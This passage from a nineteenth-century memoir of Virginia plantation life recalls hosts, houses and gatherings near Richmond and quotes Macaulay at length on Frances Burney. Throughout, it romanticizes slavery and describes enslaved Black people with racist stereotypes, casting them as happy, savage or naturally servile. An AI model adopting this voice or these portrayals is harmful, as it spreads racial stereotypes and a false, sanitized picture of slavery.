Virginians accords with the scenery around them, how their hearts
must be filled with gentleness and charity inspired by the landscape
which stretches far and fades in softness against the sky! How must
their minds be filled with noble aspirations suggested by the
everlasting mountains! How their souls must be filled with thoughts
of heaven as they look upon the glorious sunsets bathing the
mountains in rose-colored light, with the towering peaks ever
pointing heavenward and seeming to say: "Behold the glory of a
world beyond!"[14]
Beneath the shadow of the "Peaks" were many happy homes and
true hearts, and, among these, memory recalls none more vividly
than Otterburn and its inmates.
Otterburn was the residence of a gentleman and his wife who,
having no children, devoted themselves to making their home
attractive to visitors, in which they succeeded so well that they were
rarely without company, for all who went once to see them went
again and again.
This gentleman, Benjamin Donald, was a man of high character,—his
accomplishments, manner and appearance marking him
"rare,"—"one in a century." Above his fellow-men in greatness of
soul, he could comprehend nothing mean. His stature was tall and
erect; his features bold; his countenance open and impressive; his
mind vigorous and cultivated; his bearing dignified, but not haughty;
his manners simple and attractive; his conversation so agreeable and
enlivening that the dullest company became animated as soon as he
came into the room. Truth and lofty character were so unmistakably
stamped upon him that a day's acquaintance convinced one he could
be trusted forever. Brought up in Scotland, the home of his
ancestors, in him were blended the best points of Scotch and
Virginia character,—strict integrity and whole-souled generosity and
hospitality.
How many days and nights we passed at his house, and in childhood
and youth how many hours were we entertained by his bright and
instructive conversation! Especially delightful was it to hear his
stories of Scotland, which brought vividly before us pictures of its
lakes and mountains and castles. How often did we listen to his
account of the wedding-tour to Scotland, when he carried his
Virginia bride to the old home at Greenock! And how often we
laughed about the Scotch children, his nieces and nephews, who, on
first seeing his wife, clapped their hands and shouted: "Oh, mother!
are you not glad uncle did not marry a black woman?" Hearing he
was to marry a Virginian, they expected to see a savage Indian or
negro! And some of the family who went to Liverpool to meet them,
and were looking through spy-glasses when the vessel arrived, said
they were "sure the Virginia lady had not come, because they saw
no one among the passengers dressed in a red shawl and gaudy
bonnet like an Indian"!
From this we thought that Europeans must be very ignorant of our
country and its inhabitants, and we have since learned that their
children are purposely kept ignorant of facts in regard to America
and its people.
Among many other recollections of this dear old friend of Otterburn I
shall never forget a dream he told us one night, which so impressed
us that, before his death, we asked him to write it out, which he did;
and, as the copy is before me in his own handwriting, I will insert it
here:
"About the time I became of age I returned to Virginia
for the purpose of looking after and settling my
father's estate. Three years thereafter I received a
letter from my only sister, informing me that she was
going to be married, and pressing me in the most
urgent manner to return to Scotland to be present at
her marriage, and to attend to the drawing of the
marriage contract. The letter gave me a good deal of
trouble, as it did not suit me to leave Virginia at that
time. I went to bed one night, thinking much on this
subject, but soon fell asleep, and dreamed that I
landed in Greenock in the night-time, and pushed for
home, thinking I would take my aunt and sister by
surprise.
"When I arrived at the door, I found all still and quiet,
and the out-door locked. I thought, however, that I
had in my pocket my check-key, with which I quietly
opened the door and groped my way into the sitting-
room, but, finding no one there, I concluded they had
gone to bed. I then went upstairs to their bedroom,
and found that unoccupied. I then concluded they had
taken possession of my bedroom in my absence, but,
not finding them there, became very uneasy about
them. Then it struck me they might be in the guest's
chamber, a room downstairs kept exclusively for
company. Upon going there I found the door partially
open; I saw my aunt removing the burning coals from
the top of the grate preparatory to going to bed. My
sister was sitting up in bed, and as I entered the room
she fixed her eyes upon me, but did not seem to
recognize me. I approached toward her, and, in the
effort to make myself known, awoke and found it all a
dream. At breakfast next morning I felt wearied and
sick, and could not eat, and told the family of my
(dream) journey overnight.
"I immediately commenced preparing, and in a very
short time returned to Scotland. I saw my sister
married, and she and her husband set off on their
'marriage jaunt.' About a month thereafter they
returned, and at dinner I commenced telling them of
my dream; but, observing they had quit eating and
were staring at me, I laughed, and asked what was
the matter, whereupon my brother-in-law very
seriously asked me to go on. When I finished, they
asked me if I remembered the exact time of my
dream. I told them it distressed and impressed me so
strongly that I noted it down at the time. I pulled out
my pocketbook and showed them the date, '14th day
of May,' written in pencil. They all rose from the table
and took me into the bedroom and showed me,
written with pencil on the white mantelpiece, '14th of
May.'
"I asked them what that meant, and was informed that
on that very night—and the only night they ever
occupied that room during my absence—my aunt was
taking the coals off of the fire, when my sister
screamed out: 'Brother has come!'
"My aunt scolded her, and said she was dreaming; but
she said she had not been to sleep, was sitting up in
bed, and saw me enter the room, and run out when
she screamed. So confident was she that she had seen
me, and that I had gone off and hidden, that the
whole house was thoroughly searched for me, and as
soon as day dawned a messenger was sent to inquire
if any vessel had arrived from America, or if I had been
seen by any of my friends."
No one who visited Otterburn can forget the smiling faces of the
negro servants about the house, who received the guests with as
true cordiality as did their mistress, expressing their pleasure by
widespread mouths showing white teeth (very white by contrast with
their jet-black skin), and when the guests were going away always
insisted on their remaining longer.
One of these negro women was not only an efficient servant, but a
valuable friend to her mistress.
In the absence of her master and mistress she kept the keys, often
entertaining their friends, who, in passing from distant plantations,
were accustomed to stop, and who received from her a cordial
welcome, finding on the table as many delicacies as if the family had
been at home.
No more sincere attachment could have existed than that between
this lady and her servant. At last, when the latter was seized with a
contagious fever which ended her life, she could not have had a
more faithful friend and nurse than was her mistress.
The same fever attacked all the negroes on the plantation, and none
can describe the anxiety, care, and distress of their owners, who
watched by their beds day and night, administering medicine and
relieving the sick and dying.

CHAPTER XIII.
Among other early recollections is a visit with my mother to the
plantation of a favorite cousin, not far from Richmond, and one of
the handsomest seats on the James River. This residence—Howard's
Neck[15]—was a favorite resort for people from Richmond and the
adjacent counties, and, like many others on the river, always full of
guests; a round of visiting and dinner parties being kept up from one
house to another, so that the ladies presiding over these
establishments had no time to attend to domestic duties, which were
left to their housekeepers while they were employed entertaining
visitors.
The negroes on these estates appeared lively and happy—that is, if
singing and laughing indicate happiness; for they went to their work
in the fields singing, and returned in the evening singing, after which
they often spent the whole night visiting from one plantation to
another, or dancing until day to the music of the banjo or "fiddle."
These dances were wild and boisterous, their evolutions being like
those of the savage dances described by travelers in Africa. Although
the most perfect timists, their music, with its wild, melancholy
cadence, half savage, half civilized, cannot be imitated or described.
Many a midnight were we wakened by their wild choruses, sung as
they returned from a frolic or "corn-shucking," sounding at first like
some hideous, savage yell, but dying away on the air, echoing a
cadence melancholy and indescribable, with a peculiar pathos, and
yet without melody or sweetness.
Corn-shuckings were occasions of great hilarity and good eating. The
negroes from various plantations assembled at night around a huge
pile of corn. Selecting one of their number—usually the most original
and amusing, and possessed of the loudest voice—they called him
"captain." The captain seated himself on top of the pile—a large
lightwood torch burning in front of him, and, while he shucked,
improvised words and music to a wild "recitative," the chorus of
which was caught up by the army of shuckers around. The glare of
the torches on the black faces, with the wild music and impromptu
words, made a scene curious even to us who were so accustomed to
it.
After the corn was shucked they assembled around a table laden
with roasted pigs, mutton, beef, hams, cakes, pies, coffee, and other
substantials—many participating in the supper who had not in the
work. The laughing and merriment continued until one or two o'clock
in the morning.
On these James River plantations distinguished foreigners were
often entertained, who, visiting Richmond, desired to see something
of Virginia country life. Mr. Thackeray was once a guest at one of
these places, but Dickens never visited them. Could he have passed
a month at any one of the homes I have described, he would, I am
sure, have written something more flattering of Americans and
American life than is found in "Martin Chuzzlewit" and "American
Notes." However, with these we should not quarrel, as some of the
sketches, especially the one on "tobacco-chewers," we can
recognize.
Every nation has a right to its prejudices—certainly the English
people have such a right as regards America, this country appearing
to the English eye like a huge mushroom, the growth of a night, and
unsubstantial. But it is surely wrong to censure a whole nation—as
some have done the Southern people—for the faults of a few.
Although the right of a nation to its prejudices be admitted, no one
has a right, without thorough examination and acquaintance with
the subject, to publish as facts the exaggerated accounts of another
nation, put forth by its enemies. The world in this way receives very
erroneous impressions.
For instance, we have no right to suppose the Germans a cruel race
because of the following paragraph clipped from a recent
newspaper:
"The cruelty of German officers is a matter of
notoriety, but an officer in an artillery regiment has
lately gone beyond precedent in ingenuity of cruelty.
Some of his men being insubordinate, he punished
them by means of a 'spurring process,' which consisted
in jabbing spurs persistently and brutally into their
legs. By this process his men were so severely injured
that they had to go to the hospital."
Neither have we a right to pronounce all Pennsylvanians cruel to
their "helps," as they call them, because a Pennsylvania lady told me
"the only way she could manage her help"—a white girl fourteen
years old—"was by holding her head under the pump and pumping
water upon it until she lost her breath,"—a process I could not have
conceived, and which filled me with horror.
But sorrow and oppression, we suppose, may be found in some form
in every clime, and in every phase of existence some hearts are
"weary and heavy laden." Even Dickens, whose mind naturally
sought and fed upon the comic, saw wrong and oppression in the
"humane institutions" of his own land!
And Macaulay gives a painful picture of Mme. D'Arblay's life as
waiting-maid to Queen Charlotte—from which we are not to infer,
however, that all queens are cruel to their waiting-maids.
Mme. D'Arblay—whose maiden name was Frances Burney—was the
first female novelist in England who deserved and received the
applause of her countrymen. The most eminent men of London paid
homage to her genius. Johnson, Burke, Windham, Gibbon, Reynolds,
Sheridan, were her friends and ardent eulogists. In the midst of her
literary fame, surrounded by congenial friends, herself a star in this
select and brilliant coterie, she was offered the place of waiting-maid
in the palace. She accepted the position, and bade farewell to all
congenial friends and pursuits. "And now began," says Macaulay, "a
slavery of five years—of five years taken from the best part of her
life, and wasted in menial drudgery. The history of an ordinary day
was this: Miss Burney had to rise and dress herself early, that she
might be ready to answer the royal bell, which rang at half after
seven. Till about eight she attended in the queen's dressing-room,
and had the honor of lacing her august mistress's stays, and of
putting on the hoop, gown, and neck-handkerchief. The morning was
chiefly spent in rummaging drawers and laying fine clothes in their
proper places. Then the queen was to be powdered and dressed for
the day. Twice a week her Majesty's hair had to be curled and
craped; and this operation added a full hour to the business of the
toilet. It was generally three before Miss Burney was at liberty. At
five she had to attend her colleague, Mme. Schwellenberg, a hateful
old toadeater, as illiterate as a chambermaid, proud, rude, peevish,
unable to bear solitude, unable to conduct herself with common
decency in society. With this delightful associate Frances Burney had
to dine and pass the evening. The pair generally remained together
from five to eleven, and often had no other company the whole
time. Between eleven and twelve the bell rang again. Miss Burney
had to pass a half hour undressing the queen, and was then at
liberty to retire.
"Now and then, indeed, events occurred which disturbed the
wretched monotony of Frances Burney's life. The court moved from
Kew to Windsor, and from Windsor back to Kew.
"A more important occurrence was the king's visit to Oxford. Then
Miss Burney had the honor of entering Oxford in the last of a long
string of carriages, which formed the royal procession, of walking
after the queen all day through refectories and chapels, and of
standing half dead with fatigue and hunger, while her august
mistress was seated at an excellent cold collation. At Magdalen
College Frances was left for a moment in a parlor, where she sank
down on a chair. A good-natured equerry saw that she was
exhausted, and shared with her some apricots and bread, which he
had wisely put in his pockets. At that moment the door opened, the
queen entered, the wearied attendants sprang up, the bread and
fruit were hastily concealed.
"After this the king became very ill, and during more than two years
after his recovery Frances dragged on a miserable existence at the
palace. Mme. Schwellenberg became more and more insolent and
intolerable, and now the health of poor Frances began to give way:
and all who saw her pale face, her emaciated figure, and her feeble
walk predicted that her sufferings would soon be over.
"The queen seems to have been utterly regardless of the comfort,
the health, the life, of her attendants. Weak, feverish, hardly able to
stand, Frances had still to rise before seven, in order to dress the
sweet queen, and sit up till midnight, in order to undress the sweet
queen. The indisposition of the handmaid could not and did not
escape the notice of her royal mistress. But the established doctrine
of the court was that all sickness was to be considered as a pretense
until it proved fatal. The only way in which the invalid could clear
herself from the suspicion of malingering, as it is called in the army,
was to go on lacing and unlacing, till she fell down dead at the royal
feet."
Finally Miss Burney's father pays her a visit in this palace prison,
when "she told him that she was miserable; that she was worn with
attendance and want of sleep; that she had no comfort in life,—
nothing to love, nothing to hope; that her family and friends were to
her as though they were not, and were remembered by her as men
remember the dead. From daybreak to midnight the same killing
labor, the same recreation, more hateful than labor itself, followed
each other without variety, without any interval of liberty or repose."
Her father's veneration for royalty amounting to idolatry, he could
not bear to remove her from the court—"and, between the dear
father and the sweet queen, there seemed to be little doubt that
some day or other Frances would drop down a corpse. Six months
had elapsed since the interview between the parent and the
daughter. The resignation was not sent in. The sufferer grew worse
and worse. She took bark, but it failed to produce a beneficial effect.
She was stimulated with wine; she was soothed with opium, but in
vain. Her breath began to fail. The whisper that she was in a decline
spread through the court. The pains in her side became so severe
that she was forced to crawl from the card-table of the old fury,
Mme. Schwellenberg, to whom she was tethered, three or four times
in an evening, for the purpose of taking hartshorn. Had she been a
negro slave, a humane planter would have excused her from work.
But her Majesty showed no mercy. Thrice a day the accursed bell
still rang; the queen was still to be dressed for the morning at seven,
and to be dressed for the day at noon, and to be undressed at
midnight."
At last Miss Burney's father was moved to compassion and allowed
her to write a letter of resignation. "Still I could not," writes Miss
Burney in her diary, "summon courage to present my memorial from
seeing the queen's entire freedom from such an expectation. For
though I was frequently so ill in her presence that I could hardly
stand, I saw she concluded me, while life remained, inevitably hers.
"At last, with a trembling hand, the paper was delivered. Then came
the storm. Mme. Schwellenberg raved like a maniac. The resignation
was not accepted. The father's fears were aroused, and he declared,
in a letter meant to be shown to the queen, that his daughter must
retire. The Schwellenberg raged like a wildcat. A scene almost
horrible ensued.
"The queen then promised that, after the next birthday, Miss Burney
should be set at liberty. But the promise was ill kept; and her
Majesty showed displeasure at being reminded of it."
At length, however, the prison door was opened, and Frances was
free once more. Her health was restored by traveling, and she
returned to London in health and spirits. Macaulay tells us that she
went to visit the palace, "her old dungeon, and found her successor
already far on the way to the grave, and kept to strict duty, from
morning till midnight, with a sprained ankle and a nervous fever."
An ignorant and unlettered woman would doubtless not have found
this life in the palace tedious, and our sympathy would not have
been aroused for her; for as long as the earth lasts there must be
human beings fitted for every station, and it is supposed, till the end
of all things, there must be cooks, housemaids, and dining-room
servants, which will make it never possible for the whole human
family to stand entirely upon the same platform socially and
intellectually. And Miss Burney's wretchedness, which calls forth our
sympathy, was not because she had to perform the duties of
waiting-maid, but because to a gifted and educated woman these
duties were uncongenial; and congeniality means happiness;
uncongeniality, unhappiness.

CHAPTER XIV.
From the sorrows of Miss Burney in the palace—a striking contrast
with the menials described in our own country homes—I will turn to
another charming place on the James River—Powhatan Seat, a mile
below Richmond, which had descended in the Mayo family two
hundred years.
Here, it was said, the Indian chief Powhatan had lived, and here was
shown the veritable stone supposed to have been the one upon
which Captain Smith's head was laid, when the Indian princess
Pocahontas rescued him.
This historic stone, near the parlor window, was only an ugly, dark,
broad, flat stone, but imagination pictured ever around it the Indian
group, Smith's head upon it, the infuriated chief with uplifted club in
the act of dealing the death-blow, the grief and shriek of Pocahontas
as she threw herself upon Smith, imploring her father to spare him,
—a piercing cry to have penetrated the heart of the savage chief!
Looking out from the parlor window and imagining this savage
scene, how strange a contrast met the eye within! Around the
fireside assembled the loveliest family group, where kindness and
affection beamed in every eye, and father, mother, brothers, and
sisters were linked together by tenderest devotion and sympathy.
If natural scenery reflects itself upon the heart, no wonder a "holy
calm" rested upon this family, for far down the river the prospect
was peace and tranquillity; and many an evening in the summer-
house on the river bank we drank in the beauty of soft blue skies,
green isles, and white sails floating in the distance.
Many in Richmond remember the delightful weddings and parties at
Powhatan Seat, where assembled the élite from Richmond, with an
innumerable throng of cousins, aunts, and uncles from Orange and
Culpeper counties.
On these occasions the house was illuminated by wax lights issuing
from bouquets of magnolia leaves placed around the walls near the
ceiling, and looking prettier than any glass chandelier.
We, from a distance, generally stayed a week after the wedding,
becoming, as it were, a part of the family circle; and the bride did
not rush off on a tour as is the fashion nowadays, but remained
quietly at home, enjoying the society of her family and friends.
One feature I have omitted in describing our weddings and parties—
invariably a part of the picture—was the sea of black faces
surrounding the doors and windows to look on the dancing, hear the
music, and afterward get a good share of the supper.
Tourists often went to walk around the beautiful grounds at
Powhatan—so neatly kept with sea-shells around the flowers, and
pleasant seats under the lindens and magnolias—and to see the
historic stone; but I often thought they knew not what was missed
in not knowing, as we did, the lovely family within.
But, for us, those rare, beautiful days at Powhatan are gone forever;
for since the war the property has passed into strange hands, and
the family who once owned it will own it no more.
During the late war heavy guns were placed in the family burying-
ground on this plantation—a point commanding the river; and here
was interred the child of a distinguished general[16] in the Northern
army—a Virginian, formerly in the United States army—who had
married a member of the Powhatan family. He was expected to
make an attack upon Richmond, and over his child's grave was
placed a gun to fire upon him. Such are the unnatural incidents of
civil war.
About two miles from Powhatan Seat was another beautiful old place
—Mount Erin—the plantation formerly of a family all of whom,
except two sisters, had died. The estate, becoming involved, had to
be sold, which so grieved and distressed these sisters that they
passed hours weeping if accidentally the name of their old home
was mentioned in their presence.
Once when we were at Powhatan, and these ladies were among the
guests, a member of the Powhatan family ordered the carriage, and
took my sister and myself to Mount Erin, telling us to keep it a secret
when we returned, for "the sisters," said she, "would neither eat nor
sleep if reminded of their old home."
A pleasant drive brought us to Mount Erin, and when we saw the
box hedges, gravel walks, and linden trees we were no longer
surprised at the grief of the sisters whose hearts entwined around
their old home. The house was in charge of an old negro woman—
the purchaser not having moved in—who showed us over the
grounds; and every shrub and flower seemed to speak of days gone
by. Even the ivy on the old bricks looked gloomy, as if mourning the
light, mirth, and song departed from the house forever; and the
walks gave back a deadened echo, as if they wished not to be
disturbed by stranger tread. All seemed in a reverie, dreaming a long
sweet dream of the past, and entering into the grief of the sisters,
who lived afterward for many years in a pleasant home on a
pleasant street in Richmond, with warm friends to serve them, yet
their tears never ceased to flow at the mention of Mount Erin.

One more plantation picture, and enough will have been described
to show the character of the homes and people on our plantations.
Welcome to our website – the ideal destination for book lovers and
knowledge seekers. With a mission to inspire endlessly, we offer a
vast collection of books, ranging from classic literary works to
specialized publications, self-development books, and children's
literature. Each book is a new journey of discovery, expanding
knowledge and enriching the soul of the reade

Our website is not just a platform for buying books, but a bridge
connecting readers to the timeless values of culture and wisdom. With
an elegant, user-friendly interface and an intelligent search system,
we are committed to providing a quick and convenient shopping
experience. Additionally, our special promotions and home delivery
services ensure that you save time and fully enjoy the joy of reading.

Let us accompany you on the journey of exploring knowledge and

personal growth!

textbookfull.com